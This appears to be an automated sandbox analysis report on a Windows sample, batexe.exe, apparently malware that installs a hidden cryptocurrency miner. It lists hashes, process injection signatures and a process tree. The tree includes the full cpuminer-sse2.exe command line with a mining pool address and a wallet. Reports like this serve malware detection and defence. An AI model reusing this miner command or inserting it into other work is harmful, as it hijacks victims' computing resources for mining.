Analysis
- max time kernel: 295s
- max time network: 306s
- platform: windows10-1703_x64
- resource: win10-20231215-ja
- resource tags: arch:x64, arch:x86, image:win10-20231215-ja, locale:ja-jp, os:windows10-1703-x64, system:windows
- submitted: 11/02/2024, 12:29
Behavioral task: behavioral1
  Sample: batexe.exe
  Resource: win10-20231215-ja
Behavioral task: behavioral2
  Sample: batexe.exe
  Resource: win10v2004-20231215-ja
General
- Target: batexe.exe
- Size: 9.4MB
- MD5: cdc9eacffc6d2bf43153815043064427
- SHA1: d05101f265f6ea87e18793ab0071f5c99edf363f
- SHA256: 73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
- SHA512: fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
- SSDEEP: 196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
- Executes dropped EXE (2 IoCs)
    pid   Process
    648   b2e.exe
    3304  cpuminer-sse2.exe
- Loads dropped DLL (5 IoCs)
    pid   Process
    3304  cpuminer-sse2.exe
    3304  cpuminer-sse2.exe
    3304  cpuminer-sse2.exe
    3304  cpuminer-sse2.exe
    3304  cpuminer-sse2.exe
- YARA match on memory dump
    resource                                                                 yara_rule
    behavioral1/memory/520-5-0x0000000000400000-0x000000000393A000-memory.dmp  upx
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious use of WriteProcessMemory (8 IoCs)
    description                       pid   Process     procid_target
    PID 520 wrote to memory of 648    520   batexe.exe  74
    PID 520 wrote to memory of 648    520   batexe.exe  74
    PID 520 wrote to memory of 648    520   batexe.exe  74
    PID 648 wrote to memory of 4860   648   b2e.exe     75
    PID 648 wrote to memory of 4860   648   b2e.exe     75
    PID 648 wrote to memory of 4860   648   b2e.exe     75
    PID 4860 wrote to memory of 3304  4860  cmd.exe     78
    PID 4860 wrote to memory of 3304  4860  cmd.exe     78
Processes (process tree; the leading number is the depth, each child is indented under its parent)
1 C:\Users\Admin\AppData\Local\Temp\batexe.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  PID: 520
  Signatures: Suspicious use of WriteProcessMemory
  2 C:\Users\Admin\AppData\Local\Temp\12D7.tmp\b2e.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\12D7.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\12D7.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    PID: 648
    Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
    3 C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1AA7.tmp\batchfile.bat" "
      PID: 4860
      Signatures: Suspicious use of WriteProcessMemory
      4 C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
        Command line: cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
        PID: 3304
        Signatures: Executes dropped EXE; Loads dropped DLL
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 3.2MB
  MD5: 35d614acc52ac1f063676559357ef3a0
  SHA1: 38bb0f406b81b4c032d7958594010287638ecd96
  SHA256: 397dbf36993a3df62c00ff4c243d4fa121db1cedc849f2463fde7f4b6b8005d0
  SHA512: 0c20d72bef049a19448ff7864f4f57a113dcbaff81dad6c45b4073cddfb9e719f5053242d98d312263a7bec791a002f26c62a24b83fc755a5ee1f47a7f8427fb
- Filesize: 2.3MB
  MD5: 95d0895d47c630fe64aec4efc6503ff1
  SHA1: 42d51bf0d6d09b4102fc60448ff483bcd264a897
  SHA256: c998279cbf40944a56e0e6f69f5c92f4aa319880ec14dccfdf6c5b76de5ccb0b
  SHA512: b7f633d7396a0386e6f6f04602982a66305d3c9ec97e4e8aba616728d15ad91984f1107bf3b1f65e9cb41c9a3d835538c53239fead4bb06bb5253ad36f45ed01
- Filesize: 136B
  MD5: 8ea7ac72a10251ecfb42ef4a88bd330a
  SHA1: c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
  SHA256: 65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
  SHA512: a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
- Filesize: 762KB
  MD5: 3e70e1a00d8117011a919a6c5a231787
  SHA1: dfd5fe9d6b1c798b5384310ae4523fdc6bfdbb2d
  SHA256: e033d3196cc647e764956749aa299d458825029f24c1d9e478ab0e03ce86ef14
  SHA512: 1c72ef6f75e266c315cfa2a538c26c94795757b6af7ec991c327ff643a719753cf3f5417c8440be13139336d4f2209d332afe52e10406ac0a58124d1aab53401
- Filesize: 1.2MB
  MD5: ab883d8c26f9a5ebbe45d5be4e2896b4
  SHA1: 55b83d7b58866db48f6e6caedec16aa8c2849a12
  SHA256: 6344788b16d68c729821b0934505d0b9bdc4c7b21dc2a57b9b764d01200469ca
  SHA512: 6571fe74ad601078121502efc23a2fa4175056ac0e52ef3deb3a851db3ca31a236cfe060830a0a4ecb2bfbca04ed7eddb04f7d4060f7db72e81a2b901afbb5ef
- Filesize: 1.0MB
  MD5: 715d6847edf90755983295df67635193
  SHA1: 2d95fade0cd604195c057057c8aa4ad91bc0c486
  SHA256: ce8bbb2e9f0991688e93b66e5e4fe69aadd9e1782671178248bae031d99876e7
  SHA512: 0b2d77adf46cf456ed4192177e2e00fdaa3a0a9d10e5a75c71cd11b3fe11e7a9932d03d9f8b6ed116323a838af01ab80f436a6878ca6f11716a494526d4bfce7
- Filesize: 314KB
  MD5: 708ba341c1a9185c9eb26c2ade842964
  SHA1: c697d45513a642940a7bb109bc682e5ec55b72ab
  SHA256: a0eb044e3be3b36cb1dfa13a100ebf7aa83b152a20fe807356e5c3f592f4c982
  SHA512: 5af1aa1b583c4b3113c04245a5f5d813ae0417d4cab06d70a570518f14b65776c3af23e33efce1d9d5b509af2fdd42112b29505d299dbb443fe0c56cfafcd002
- Filesize: 575KB
  MD5: 5a0fe35da6ddbe21ff99d857d86ad697
  SHA1: d19d524f9ad86442a96462b49adac5a13077c05a
  SHA256: 23bd97f62d12fcf3aa205492b711b3b565d12b13786130eedd2145d94a55c018
  SHA512: 07f8465c67d81b645985c80e7c8dca135943c80ba4fcc5cc907515c020cf82ec254a10c954b2cd4060eb2558b64852b6e28836052d6a7805bb280e3a25a23b2f
- Filesize: 568KB
  MD5: d7f3eb63f5a9151492c59a9c5124aa8b
  SHA1: 3dd58f0b302a4ecdedf5845751a6cf6db635a3f1
  SHA256: f2f16c407d63a0ee18f4cc805507d1ddcd7aba8c15c31a1a494c9d8aa2e2666e
  SHA512: 78fdd9850b662ab593d5a88879fb31ee5f68e8b402cf1bbc8fcc6d5f8ae6d98e578e195870331396762b56d5aec8022a916e962c06063404381938129c2300ef
- Filesize: 606KB
  MD5: 585efec1bc1d4d916a4402c9875dff75
  SHA1: d209613666ccac9d0ddab29a3bc59aa00a0968fa
  SHA256: 2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
  SHA512: b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770